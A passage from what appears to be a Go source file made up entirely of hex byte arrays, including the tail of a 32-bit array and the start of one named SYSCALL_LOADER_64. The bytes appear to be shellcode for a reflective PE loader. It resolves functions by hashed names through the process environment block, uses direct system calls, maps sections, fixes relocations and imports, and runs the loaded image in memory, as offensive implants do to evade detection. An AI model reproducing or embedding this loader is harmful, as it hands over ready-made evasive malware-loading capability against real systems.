216 | 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x30, 0x10, 0x00, 0x8d,
217 | 0x44, 0x24, 0x28, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00,
218 | 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x2c, 0x89, 0x44, 0x24, 0x04, 0xc7,
219 | 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0x68, 0x55, 0x7c, 0xce, 0x99, 0xe8,
220 | 0x96, 0x06, 0x00, 0x00, 0x83, 0xc4, 0x04, 0xff, 0xd0, 0x83, 0xec, 0x18,
221 | 0x89, 0xc2, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x85, 0xd2, 0x78, 0x5c, 0x8b,
222 | 0x47, 0x54, 0x89, 0x44, 0x24, 0x08, 0x89, 0x6c, 0x24, 0x04, 0x8b, 0x44,
223 | 0x24, 0x2c, 0x89, 0x04, 0x24, 0xe8, 0x05, 0xff, 0xff, 0xff, 0x0f, 0xb7,
224 | 0x47, 0x14, 0x8d, 0x5c, 0x07, 0x18, 0x66, 0x83, 0x7f, 0x06, 0x00, 0x74,
225 | 0x32, 0xbe, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x43, 0x0c, 0x03, 0x44, 0x24,
226 | 0x2c, 0x89, 0xea, 0x03, 0x53, 0x14, 0x8b, 0x4b, 0x10, 0x89, 0x4c, 0x24,
227 | 0x08, 0x89, 0x54, 0x24, 0x04, 0x89, 0x04, 0x24, 0xe8, 0xd2, 0xfe, 0xff,
228 | 0xff, 0x83, 0xc6, 0x01, 0x83, 0xc3, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x39,
229 | 0xf0, 0x7f, 0xd3, 0x8b, 0x44, 0x24, 0x2c, 0x83, 0xc4, 0x3c, 0x5b, 0x5e,
230 | 0x5f, 0x5d, 0xc3, 0x57, 0x53, 0x81, 0xec, 0x34, 0x02, 0x00, 0x00, 0x8b,
231 | 0x9c, 0x24, 0x40, 0x02, 0x00, 0x00, 0xc7, 0x84, 0x24, 0x2c, 0x02, 0x00,
232 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x7c, 0x24, 0x1c, 0xb9, 0x82, 0x00,
233 | 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xf3, 0xab, 0x80, 0x3b, 0x00,
234 | 0x0f, 0x84, 0x98, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x89,
235 | 0xd0, 0x83, 0xc2, 0x01, 0x80, 0x3c, 0x13, 0x00, 0x75, 0xf5, 0x01, 0xd2,
236 | 0x66, 0x89, 0x94, 0x24, 0x24, 0x02, 0x00, 0x00, 0x83, 0xc2, 0x02, 0x66,
237 | 0x89, 0x94, 0x24, 0x26, 0x02, 0x00, 0x00, 0x8d, 0x54, 0x24, 0x1c, 0x89,
238 | 0x94, 0x24, 0x28, 0x02, 0x00, 0x00, 0x85, 0xc0, 0x78, 0x12, 0x66, 0x0f,
239 | 0xbe, 0x14, 0x03, 0x66, 0x89, 0x54, 0x44, 0x1c, 0x83, 0xe8, 0x01, 0x83,
240 | 0xf8, 0xff, 0x75, 0xee, 0x8d, 0x84, 0x24, 0x2c, 0x02, 0x00, 0x00, 0x89,
241 | 0x44, 0x24, 0x0c, 0x8d, 0x84, 0x24, 0x24, 0x02, 0x00, 0x00, 0x89, 0x44,
242 | 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04,
243 | 0x24, 0x00, 0x00, 0x00, 0x00, 0x68, 0xa4, 0xb9, 0xeb, 0xb4, 0xe8, 0x77,
244 | 0x05, 0x00, 0x00, 0x83, 0xc4, 0x04, 0xff, 0xd0, 0x83, 0xec, 0x10, 0x85,
245 | 0xc0, 0x78, 0x10, 0x8b, 0x84, 0x24, 0x2c, 0x02, 0x00, 0x00, 0x81, 0xc4,
246 | 0x34, 0x02, 0x00, 0x00, 0x5b, 0x5f, 0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00,
247 | 0xeb, 0xf0, 0x66, 0xc7, 0x84, 0x24, 0x24, 0x02, 0x00, 0x00, 0x00, 0x00,
248 | 0x66, 0xc7, 0x84, 0x24, 0x26, 0x02, 0x00, 0x00, 0x02, 0x00, 0x8d, 0x44,
249 | 0x24, 0x1c, 0x89, 0x84, 0x24, 0x28, 0x02, 0x00, 0x00, 0xeb, 0x8d, 0x55,
250 | 0x57, 0x56, 0x53, 0x8b, 0x6c, 0x24, 0x14, 0x89, 0xeb, 0x03, 0x5d, 0x3c,
251 | 0x8b, 0x93, 0xa0, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x85,
252 | 0xd2, 0x74, 0x62, 0x01, 0xea, 0x89, 0xee, 0x2b, 0x73, 0x34, 0x83, 0x3a,
253 | 0x00, 0x75, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x4f, 0x0f, 0xb7,
254 | 0x08, 0x81, 0xe1, 0xff, 0x0f, 0x00, 0x00, 0x03, 0x0a, 0x01, 0x74, 0x0d,
255 | 0x00, 0x83, 0xc0, 0x02, 0x89, 0xd1, 0x03, 0x4a, 0x04, 0x39, 0xc8, 0x74,
256 | 0x18, 0x0f, 0xb6, 0x48, 0x01, 0x89, 0xcf, 0x83, 0xe7, 0xf0, 0x89, 0xfb,
257 | 0x80, 0xfb, 0x30, 0x74, 0xd5, 0x80, 0xf9, 0x0f, 0x76, 0xdf, 0xcc, 0xeb,
258 | 0xdc, 0x89, 0xc2, 0x83, 0x3a, 0x00, 0x74, 0x10, 0x8d, 0x42, 0x08, 0x89,
259 | 0xd1, 0x03, 0x4a, 0x04, 0x39, 0xc8, 0x75, 0xd5, 0x89, 0xca, 0xeb, 0xeb,
260 | 0xb8, 0x01, 0x00, 0x00, 0x00, 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x57,
261 | 0x56, 0x53, 0x83, 0xec, 0x2c, 0x8b, 0x6c, 0x24, 0x40, 0x8b, 0x45, 0x3c,
262 | 0x8b, 0x94, 0x05, 0x80, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00,
263 | 0x85, 0xd2, 0x0f, 0x84, 0xb4, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x15, 0x00,
264 | 0x89, 0x44, 0x24, 0x1c, 0x8b, 0x40, 0x0c, 0x85, 0xc0, 0x75, 0x74, 0xb8,
265 | 0x01, 0x00, 0x00, 0x00, 0xe9, 0x9b, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
266 | 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0x3c, 0x24,
267 | 0xe8, 0x8f, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x02, 0x89, 0x06, 0x83,
268 | 0xc3, 0x04, 0x83, 0xc6, 0x04, 0x8b, 0x03, 0x85, 0xc0, 0x74, 0x34, 0x85,
269 | 0xc0, 0x78, 0xd6, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8d,
270 | 0x44, 0x05, 0x02, 0x89, 0x04, 0x24, 0xe8, 0xe8, 0xfc, 0xff, 0xff, 0xc7,
271 | 0x44, 0x24, 0x08, 0xff, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x89,
272 | 0x3c, 0x24, 0xe8, 0x51, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0xc4, 0x89,
273 | 0x06, 0xeb, 0xc0, 0x83, 0x44, 0x24, 0x1c, 0x14, 0x8b, 0x44, 0x24, 0x1c,
274 | 0x8b, 0x40, 0x0c, 0x85, 0xc0, 0x74, 0x25, 0x01, 0xe8, 0x89, 0x04, 0x24,
275 | 0xe8, 0xe2, 0xfd, 0xff, 0xff, 0x89, 0xc7, 0x85, 0xc0, 0x74, 0x1c, 0x8b,
276 | 0x44, 0x24, 0x1c, 0x89, 0xeb, 0x03, 0x18, 0x89, 0xee, 0x03, 0x70, 0x10,
277 | 0x8b, 0x03, 0x85, 0xc0, 0x75, 0x99, 0xeb, 0xcb, 0xb8, 0x01, 0x00, 0x00,
278 | 0x00, 0xeb, 0x05, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x83, 0xc4, 0x2c, 0x5b,
279 | 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x57, 0x56, 0x53, 0x83, 0xe4,
280 | 0xf0, 0x81, 0xec, 0x40, 0x02, 0x00, 0x00, 0x8b, 0x5d, 0x08, 0x89, 0xd8,
281 | 0x03, 0x43, 0x3c, 0x89, 0xda, 0x03, 0x50, 0x78, 0x8b, 0x40, 0x7c, 0x89,
282 | 0x44, 0x24, 0x1c, 0x8b, 0x7a, 0x20, 0x8b, 0x42, 0x1c, 0x89, 0x44, 0x24,
283 | 0x2c, 0x8b, 0x42, 0x24, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x4a, 0x18, 0x85,
284 | 0xc9, 0x0f, 0x84, 0x6b, 0x01, 0x00, 0x00, 0xbe, 0x00, 0x00, 0x00, 0x00,
285 | 0x01, 0xdf, 0x89, 0x54, 0x24, 0x24, 0x89, 0x4c, 0x24, 0x20, 0xc7, 0x44,
286 | 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89, 0xd8, 0x03, 0x04, 0xb7, 0x89,
287 | 0x04, 0x24, 0xe8, 0x20, 0xfc, 0xff, 0xff, 0x39, 0x75, 0x10, 0x74, 0x1a,
288 | 0x3b, 0x45, 0x0c, 0x74, 0x15, 0x83, 0xc6, 0x01, 0x8b, 0x44, 0x24, 0x20,
289 | 0x39, 0xc6, 0x75, 0xd6, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x0a, 0x01,
290 | 0x00, 0x00, 0x8b, 0x54, 0x24, 0x24, 0x8d, 0x04, 0x73, 0x8b, 0x4c, 0x24,
291 | 0x28, 0x0f, 0xb7, 0x04, 0x08, 0x8d, 0x04, 0x83, 0x8b, 0x4c, 0x24, 0x2c,
292 | 0x03, 0x1c, 0x08, 0x39, 0xd3, 0x0f, 0x82, 0xe7, 0x00, 0x00, 0x00, 0x8b,
293 | 0x44, 0x24, 0x1c, 0x01, 0xc2, 0x39, 0xd3, 0x0f, 0x83, 0xd9, 0x00, 0x00,
294 | 0x00, 0xc5, 0xf9, 0xef, 0xc0, 0xc5, 0xfa, 0x7f, 0x44, 0x24, 0x38, 0x8d,
295 | 0x7c, 0x24, 0x48, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x3d, 0x00, 0x00,
296 | 0x00, 0xf3, 0xab, 0xc5, 0xfa, 0x7f, 0x84, 0x24, 0x3c, 0x01, 0x00, 0x00,
297 | 0x8d, 0xbc, 0x24, 0x4c, 0x01, 0x00, 0x00, 0xb9, 0x3d, 0x00, 0x00, 0x00,
298 | 0xf3, 0xab, 0x80, 0x3b, 0x2e, 0x0f, 0x84, 0xa9, 0x00, 0x00, 0x00, 0xbe,
299 | 0x00, 0x00, 0x00, 0x00, 0x83, 0xc6, 0x01, 0x89, 0xf0, 0x80, 0x3c, 0x33,
300 | 0x2e, 0x75, 0xf5, 0x8d, 0x54, 0x24, 0x38, 0x89, 0x44, 0x24, 0x08, 0x89,
301 | 0x5c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xe8, 0x5c, 0xfb, 0xff, 0xff, 0x8d,
302 | 0x4c, 0x33, 0x01, 0x80, 0x39, 0x00, 0x0f, 0x84, 0x87, 0x00, 0x00, 0x00,
303 | 0xb8, 0x00, 0x00, 0x00, 0x00, 0x01, 0xde, 0x83, 0xc0, 0x01, 0x89, 0xc2,
304 | 0x80, 0x7c, 0x06, 0x01, 0x00, 0x75, 0xf4, 0x8d, 0x84, 0x24, 0x3c, 0x01,
305 | 0x00, 0x00, 0x89, 0x54, 0x24, 0x08, 0x89, 0x4c, 0x24, 0x04, 0x89, 0x04,
306 | 0x24, 0xe8, 0x25, 0xfb, 0xff, 0xff, 0x8d, 0x44, 0x24, 0x38, 0x89, 0x04,
307 | 0x24, 0xe8, 0x61, 0xfc, 0xff, 0xff, 0x89, 0xc3, 0xb8, 0x00, 0x00, 0x00,
308 | 0x00, 0x85, 0xdb, 0x74, 0x2f, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00,
309 | 0x00, 0x8d, 0x84, 0x24, 0x3c, 0x01, 0x00, 0x00, 0x89, 0x04, 0x24, 0xe8,
310 | 0x0f, 0xfb, 0xff, 0xff, 0xc7, 0x44, 0x24, 0x08, 0xff, 0xff, 0xff, 0xff,
311 | 0x89, 0x44, 0x24, 0x04, 0x89, 0x1c, 0x24, 0xe8, 0x78, 0xfe, 0xff, 0xff,
312 | 0x89, 0xc3, 0x89, 0xd8, 0x8d, 0x65, 0xf4, 0x5b, 0x5e, 0x5f, 0x5d, 0xc3,
313 | 0xbe, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x58,
314 | 0xff, 0xff, 0xff, 0xba, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x85, 0xb8, 0x00,
315 | 0x00, 0x00, 0x00, 0xeb, 0xdb, 0x57, 0x56, 0x53, 0x83, 0xec, 0x08, 0x8b,
316 | 0x7c, 0x24, 0x18, 0x64, 0xa1, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x0c,
317 | 0x8d, 0x70, 0x14, 0x8b, 0x58, 0x14, 0x39, 0xde, 0x74, 0x2e, 0x0f, 0xb7,
318 | 0x43, 0x24, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x43, 0x28, 0x89, 0x04, 0x24,
319 | 0xe8, 0xa2, 0xfa, 0xff, 0xff, 0x39, 0xf8, 0x74, 0x0d, 0x8b, 0x1b, 0x39,
320 | 0xde, 0x75, 0xe3, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x03, 0x8b, 0x43,
321 | 0x10, 0x83, 0xc4, 0x08, 0x5b, 0x5e, 0x5f, 0xc3, 0xb8, 0x00, 0x00, 0x00,
322 | 0x00, 0xeb, 0xf2, 0x55, 0x57, 0x56, 0x53, 0x83, 0xec, 0x4c, 0x8b, 0x6c,
323 | 0x24, 0x60, 0x89, 0xef, 0x03, 0x7d, 0x3c, 0x0f, 0xb7, 0x47, 0x14, 0x8d,
324 | 0x5c, 0x07, 0x18, 0xc7, 0x44, 0x24, 0x3c, 0x00, 0x00, 0x00, 0x00, 0x66,
325 | 0x83, 0x7f, 0x06, 0x00, 0x74, 0x31, 0xbe, 0x00, 0x00, 0x00, 0x00, 0x89,
326 | 0xfd, 0xe9, 0x0c, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x24, 0x2f, 0x01, 0xeb,
327 | 0x41, 0xba, 0x20, 0x00, 0x00, 0x00, 0xe9, 0x8e, 0x00, 0x00, 0x00, 0xb8,
328 | 0x00, 0x00, 0x00, 0x00, 0xeb, 0x05, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x83,
329 | 0xc4, 0x4c, 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0xb8, 0x01, 0x00, 0x00, 0x00,
330 | 0xeb, 0xf1, 0x89, 0xc7, 0xc1, 0xef, 0x1f, 0xc6, 0x44, 0x24, 0x2f, 0x00,
331 | 0xa9, 0x00, 0x00, 0x00, 0x20, 0x74, 0x3a, 0xba, 0x10, 0x00, 0x00, 0x00,
332 | 0x89, 0xf9, 0x84, 0xc9, 0x74, 0x34, 0x25, 0x00, 0x00, 0x00, 0x60, 0xbf,
333 | 0x01, 0x00, 0x00, 0x00, 0x3d, 0x00, 0x00, 0x00, 0x60, 0xba, 0x20, 0x00,
334 | 0x00, 0x00, 0xb8, 0x80, 0x00, 0x00, 0x00, 0x0f, 0x45, 0xd0, 0xeb, 0x26,
335 | 0xa9, 0x00, 0x00, 0x00, 0x20, 0x75, 0x93, 0xc6, 0x44, 0x24, 0x2f, 0x01,
336 | 0xba, 0x04, 0x00, 0x00, 0x00, 0xbf, 0x00, 0x00, 0x00, 0x00, 0x25, 0x00,
337 | 0x00, 0x00, 0x60, 0x3d, 0x00, 0x00, 0x00, 0x60, 0x0f, 0x84, 0x7b, 0xff,
338 | 0xff, 0xff, 0x80, 0x7c, 0x24, 0x2f, 0x00, 0x74, 0x0c, 0x89, 0xf8, 0x84,
339 | 0xc0, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x0f, 0x45, 0xd0, 0x8b, 0x44, 0x24,
340 | 0x60, 0x8b, 0x4c, 0x24, 0x28, 0x03, 0x41, 0x0c, 0x89, 0x44, 0x24, 0x3c,
341 | 0x8b, 0x41, 0x10, 0x89, 0x44, 0x24, 0x34, 0xc7, 0x44, 0x24, 0x38, 0x00,
342 | 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x38, 0x89, 0x44, 0x24, 0x10, 0x89,
343 | 0x54, 0x24, 0x0c, 0x8d, 0x44, 0x24, 0x34, 0x89, 0x44, 0x24, 0x08, 0x8d,
344 | 0x44, 0x24, 0x3c, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff,
345 | 0xff, 0xff, 0x68, 0x41, 0x4d, 0xde, 0x6e, 0xe8, 0xb2, 0x00, 0x00, 0x00,
346 | 0x83, 0xc4, 0x04, 0xff, 0xd0, 0x83, 0xec, 0x14, 0x85, 0xc0, 0x0f, 0x88,
347 | 0x17, 0xff, 0xff, 0xff, 0x83, 0xc6, 0x01, 0x83, 0xc3, 0x28, 0x0f, 0xb7,
348 | 0x45, 0x06, 0x39, 0xf0, 0x0f, 0x8e, 0x0c, 0xff, 0xff, 0xff, 0x89, 0x5c,
349 | 0x24, 0x28, 0x8b, 0x43, 0x24, 0x85, 0xc0, 0x74, 0xe3, 0x99, 0x83, 0xe2,
350 | 0xc8, 0x83, 0xc2, 0x40, 0xa9, 0x00, 0x00, 0x00, 0x40, 0x0f, 0x84, 0x03,
351 | 0xff, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x88, 0x35, 0xff, 0xff, 0xff, 0xbf,
352 | 0x00, 0x00, 0x00, 0x00, 0xc6, 0x44, 0x24, 0x2f, 0x01, 0xba, 0x02, 0x00,
353 | 0x00, 0x00, 0xe9, 0xf1, 0xfe, 0xff, 0xff, 0x56, 0x53, 0x83, 0xec, 0x14,
354 | 0x8b, 0x74, 0x24, 0x20, 0x8b, 0x46, 0x3c, 0x8b, 0x94, 0x06, 0xc0, 0x00,
355 | 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x85, 0xd2, 0x74, 0x0d, 0x8b,
356 | 0x5c, 0x16, 0x0c, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x85, 0xdb, 0x75, 0x21,
357 | 0x83, 0xc4, 0x14, 0x5b, 0x5e, 0xc3, 0xc7, 0x44, 0x24, 0x08, 0x00, 0x00,
358 | 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x01, 0x00, 0x00, 0x00, 0x89, 0x34,
359 | 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x83, 0xc3, 0x04, 0x8b, 0x03, 0x85,
360 | 0xc0, 0x75, 0xdf, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0xd2, 0x60, 0x89,
361 | 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52,
362 | 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c,
363 | 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xf2, 0x0f, 0x38, 0xf0, 0xf8, 0xe2, 0xf2,
364 | 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78,
365 | 0xe3, 0x42, 0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49,
366 | 0x18, 0xe3, 0x34, 0x8b, 0x7d, 0xf8, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6,
367 | 0xac, 0xf2, 0x0f, 0x38, 0xf0, 0xf8, 0x38, 0xe0, 0x75, 0xf6, 0x3b, 0x7d,
368 | 0x24, 0x75, 0xe6, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c,
369 | 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89,
370 | 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0xc3, 0x5f, 0x5f, 0x5a, 0x8b, 0x12,
371 | 0xeb, 0x93, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x59, 0x29, 0xf1, 0x83, 0xc1,
372 | 0x0d, 0x89, 0xf7, 0x83, 0xef, 0x05, 0xf3, 0xaa, 0xfc, 0x89, 0xec, 0x5d,
373 | 0xff, 0xe0,
374 | }
375 |
376 | var SYSCALL_LOADER_64 = []byte{
377 | 0x5e, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0xf1, 0xe8, 0x97, 0x00, 0x00,
378 | 0x00, 0x48, 0x89, 0xc7, 0x48, 0x89, 0xf9, 0xe8, 0xe5, 0x02, 0x00, 0x00,
379 | 0x48, 0x89, 0xf9, 0xe8, 0x4c, 0x02, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8,
380 | 0xf8, 0x05, 0x00, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0xa7, 0x07, 0x00, 0x00,
381 | 0x48, 0x31, 0xc0, 0x8b, 0x47, 0x3c, 0x8b, 0x44, 0x07, 0x28, 0x48, 0x01,
382 | 0xf8, 0xe9, 0x08, 0x09, 0x00, 0x00, 0x56, 0x57, 0x48, 0x89, 0xcf, 0x48,
383 | 0x89, 0xd6, 0x4c, 0x89, 0xc1, 0xf3, 0xa4, 0x5f, 0x5e, 0xc3, 0x66, 0x85,
384 | 0xd2, 0x74, 0x24, 0x49, 0x89, 0xc8, 0x0f, 0xb7, 0xd2, 0x8d, 0x42, 0xff,
385 | 0x48, 0x8d, 0x54, 0x01, 0x01, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x41,
386 | 0x0f, 0x38, 0xf0, 0x00, 0x49, 0x83, 0xc0, 0x01, 0x49, 0x39, 0xd0, 0x75,
387 | 0xf1, 0xeb, 0x21, 0x0f, 0xb6, 0x11, 0x84, 0xd2, 0x74, 0x1b, 0x48, 0x83,
388 | 0xc1, 0x01, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xf2, 0x0f, 0x38, 0xf0, 0xc2,
389 | 0x48, 0x83, 0xc1, 0x01, 0x0f, 0xb6, 0x51, 0xff, 0x84, 0xd2, 0x75, 0xef,
390 | 0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0xf8, 0x55, 0x57, 0x56, 0x53,
391 | 0x48, 0x83, 0xec, 0x48, 0x48, 0x89, 0xcd, 0x48, 0x63, 0x79, 0x3c, 0x48,
392 | 0x01, 0xcf, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x81, 0x3f, 0x50, 0x45, 0x00,
393 | 0x00, 0x0f, 0x85, 0xa7, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38,
394 | 0x00, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x50, 0x48, 0x89, 0x44, 0x24, 0x30,
395 | 0x48, 0x8d, 0x54, 0x24, 0x38, 0xc7, 0x44, 0x24, 0x28, 0x04, 0x00, 0x00,
396 | 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30, 0x10, 0x00, 0x4c, 0x8d, 0x4c,
397 | 0x24, 0x30, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc1, 0xff,
398 | 0xff, 0xff, 0xff, 0x41, 0xba, 0x55, 0x7c, 0xce, 0x99, 0xe8, 0x27, 0x07,
399 | 0x00, 0x00, 0x49, 0x89, 0xc2, 0xe8, 0xd9, 0x07, 0x00, 0x00, 0x89, 0xc2,
400 | 0xb8, 0x00, 0x00, 0x00, 0x00, 0x85, 0xd2, 0x78, 0x51, 0x44, 0x8b, 0x47,
401 | 0x54, 0x48, 0x89, 0xea, 0x48, 0x8b, 0x4c, 0x24, 0x38, 0xe8, 0x14, 0xff,
402 | 0xff, 0xff, 0x0f, 0xb7, 0x47, 0x14, 0x48, 0x8d, 0x5c, 0x07, 0x18, 0x66,
403 | 0x83, 0x7f, 0x06, 0x00, 0x74, 0x2b, 0xbe, 0x00, 0x00, 0x00, 0x00, 0x8b,
404 | 0x4b, 0x0c, 0x48, 0x03, 0x4c, 0x24, 0x38, 0x8b, 0x53, 0x14, 0x48, 0x01,
405 | 0xea, 0x44, 0x8b, 0x43, 0x10, 0xe8, 0xe8, 0xfe, 0xff, 0xff, 0x83, 0xc6,
406 | 0x01, 0x48, 0x83, 0xc3, 0x28, 0x0f, 0xb7, 0x47, 0x06, 0x39, 0xf0, 0x7f,
407 | 0xda, 0x48, 0x8b, 0x44, 0x24, 0x38, 0x48, 0x83, 0xc4, 0x48, 0x5b, 0x5e,
408 | 0x5f, 0x5d, 0xc3, 0x57, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x49,
409 | 0x89, 0xc8, 0x48, 0xc7, 0x84, 0x24, 0x48, 0x02, 0x00, 0x00, 0x00, 0x00,
410 | 0x00, 0x00, 0xc7, 0x84, 0x24, 0x34, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
411 | 0x00, 0x48, 0x8d, 0x7c, 0x24, 0x20, 0xb9, 0x41, 0x00, 0x00, 0x00, 0xb8,
412 | 0x00, 0x00, 0x00, 0x00, 0xf3, 0x48, 0xab, 0x41, 0x80, 0x38, 0x00, 0x0f,
413 | 0x84, 0x94, 0x00, 0x00, 0x00, 0xba, 0x01, 0x00, 0x00, 0x00, 0x48, 0x89,
414 | 0xd0, 0x48, 0x83, 0xc2, 0x01, 0x41, 0x80, 0x7c, 0x10, 0xff, 0x00, 0x75,
415 | 0xf1, 0x8d, 0x14, 0x00, 0x66, 0x89, 0x94, 0x24, 0x30, 0x02, 0x00, 0x00,
416 | 0x83, 0xc2, 0x02, 0x66, 0x89, 0x94, 0x24, 0x32, 0x02, 0x00, 0x00, 0x48,
417 | 0x8d, 0x54, 0x24, 0x20, 0x48, 0x89, 0x94, 0x24, 0x38, 0x02, 0x00, 0x00,
418 | 0x83, 0xe8, 0x01, 0x78, 0x15, 0x48, 0x98, 0x66, 0x41, 0x0f, 0xbe, 0x14,
419 | 0x00, 0x66, 0x89, 0x54, 0x44, 0x20, 0x48, 0x83, 0xe8, 0x01, 0x85, 0xc0,
420 | 0x79, 0xed, 0x4c, 0x8d, 0x8c, 0x24, 0x48, 0x02, 0x00, 0x00, 0x4c, 0x8d,
421 | 0x84, 0x24, 0x30, 0x02, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9,
422 | 0x00, 0x00, 0x00, 0x00, 0x41, 0xba, 0xa4, 0xb9, 0xeb, 0xb4, 0xe8, 0x06,
423 | 0x06, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x78, 0x11, 0x48, 0x8b, 0x84,
424 | 0x24, 0x48, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x50, 0x02, 0x00, 0x00,
425 | 0x5f, 0xc3, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0xf0, 0x66, 0xc7, 0x84,
426 | 0x24, 0x30, 0x02, 0x00, 0x00, 0x00, 0x00, 0x66, 0xc7, 0x84, 0x24, 0x32,
427 | 0x02, 0x00, 0x00, 0x02, 0x00, 0x48, 0x8d, 0x44, 0x24, 0x20, 0x48, 0x89,
428 | 0x84, 0x24, 0x38, 0x02, 0x00, 0x00, 0xeb, 0x9a, 0x49, 0x89, 0xc9, 0x48,
429 | 0x63, 0x51, 0x3c, 0x48, 0x01, 0xca, 0x8b, 0x82, 0xb0, 0x00, 0x00, 0x00,
430 | 0xb9, 0x00, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x75, 0x89, 0xc0, 0x49,
431 | 0x8d, 0x0c, 0x01, 0x4d, 0x89, 0xca, 0x4c, 0x2b, 0x52, 0x30, 0x83, 0x39,
432 | 0x00, 0x75, 0x4a, 0xb9, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x5c, 0x8b, 0x11,
433 | 0x44, 0x0f, 0xb7, 0x00, 0x41, 0x81, 0xe0, 0xff, 0x0f, 0x00, 0x00, 0x4c,
434 | 0x01, 0xc2, 0x4d, 0x01, 0x14, 0x11, 0x48, 0x83, 0xc0, 0x02, 0x8b, 0x51,
435 | 0x04, 0x48, 0x01, 0xca, 0x48, 0x39, 0xd0, 0x74, 0x18, 0x0f, 0xb6, 0x50,
436 | 0x01, 0x41, 0x89, 0xd0, 0x41, 0x83, 0xe0, 0xf0, 0x41, 0x80, 0xf8, 0xa0,
437 | 0x74, 0xcc, 0x80, 0xfa, 0x0f, 0x76, 0xdb, 0xeb, 0xd9, 0x48, 0x89, 0xc1,
438 | 0x83, 0x39, 0x00, 0x74, 0x14, 0x48, 0x8d, 0x41, 0x08, 0x8b, 0x51, 0x04,
439 | 0x48, 0x01, 0xca, 0x48, 0x39, 0xd0, 0x75, 0xd1, 0x48, 0x89, 0xd1, 0xeb,
